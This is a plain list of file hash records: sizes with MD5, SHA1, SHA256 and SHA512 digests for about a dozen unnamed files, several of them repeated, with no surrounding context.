SHA256 3c3ceee61992662ef2315a39c53e3f6caefaa5d84eab0e0bd423413a29768873
SHA512 5c8e76ca65c378ee5a692b07ee14b5c4705de273666117d2e5456c32be7bc68f792c42489b01a8c1fd08030bedc6f2f18656e7ecea21c06c86c4f0b71d3b90b1
-
Filesize 1.1MB
MD5 8e6d5dc0e452ff454ac247f27e7cba7e
SHA1 17402fb31e93b1e68b37b5740e2c9e3285c012ce
SHA256 3c3ceee61992662ef2315a39c53e3f6caefaa5d84eab0e0bd423413a29768873
SHA512 5c8e76ca65c378ee5a692b07ee14b5c4705de273666117d2e5456c32be7bc68f792c42489b01a8c1fd08030bedc6f2f18656e7ecea21c06c86c4f0b71d3b90b1
-
Filesize 6.5MB
MD5 55447f754ed036c9ea0019c5b58206bd
SHA1 e5066619176a8cbb6743d87cee2a2fb9a2926dd6
SHA256 4a14afe4a03293e8abb10967647f48b6b3b00fdc6f966715f338269945da95e6
SHA512 2d2a8a01cc6dd0efcfc3a6672f284665d933607c2f8bbdd85a96417e0088675142823c441c0c85735a8a8d517fdd9433061173a5b4a22d70273821fbf6821ccc
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize 219KB
MD5 6d627955146500b912147b9c5b8e36cd
SHA1 07dfc7d7c3de27813f226fb02f39620c1d23734f
SHA256 888cf38fe7c416041a0bceaec9cf7bc9eb2f8c31bb3ad281ef28ec580285fa50
SHA512 b888c0fd254bad5e227be32ff0347ef782d6e22dd3ee758057678a01ab7293fdbade8d872b69eda0d18f35629c5c95f20b5cfdb63c4fa35b661afac366eed944
-
Filesize 219KB
MD5 6d627955146500b912147b9c5b8e36cd
SHA1 07dfc7d7c3de27813f226fb02f39620c1d23734f
SHA256 888cf38fe7c416041a0bceaec9cf7bc9eb2f8c31bb3ad281ef28ec580285fa50
SHA512 b888c0fd254bad5e227be32ff0347ef782d6e22dd3ee758057678a01ab7293fdbade8d872b69eda0d18f35629c5c95f20b5cfdb63c4fa35b661afac366eed944
-
Filesize 219KB
MD5 6d627955146500b912147b9c5b8e36cd
SHA1 07dfc7d7c3de27813f226fb02f39620c1d23734f
SHA256 888cf38fe7c416041a0bceaec9cf7bc9eb2f8c31bb3ad281ef28ec580285fa50
SHA512 b888c0fd254bad5e227be32ff0347ef782d6e22dd3ee758057678a01ab7293fdbade8d872b69eda0d18f35629c5c95f20b5cfdb63c4fa35b661afac366eed944
-
Filesize 219KB
MD5 6d627955146500b912147b9c5b8e36cd
SHA1 07dfc7d7c3de27813f226fb02f39620c1d23734f
SHA256 888cf38fe7c416041a0bceaec9cf7bc9eb2f8c31bb3ad281ef28ec580285fa50
SHA512 b888c0fd254bad5e227be32ff0347ef782d6e22dd3ee758057678a01ab7293fdbade8d872b69eda0d18f35629c5c95f20b5cfdb63c4fa35b661afac366eed944
-
Filesize 8KB
MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642
-
Filesize 5.6MB
MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
-
Filesize 180KB
MD5 4d1f0d9bfac03f5237d800cd61ed1133
SHA1 a8d2884e093ac24d23d48c804f617a0115fe697c
SHA256 2b6d2a194d0b61942c703bf307cf879f26e2dc4ab67cd77d5827e7422b287a18
SHA512 acc3da350a0b372b06cd996e35357239b3c2cf3b3cacf41b76b322c378f934217db67ec0a7efdc472b717dffb0014606fea765c4a79f0a60fc0966ec542824a9
-
Filesize 89KB
MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4
-
Filesize 273B
MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9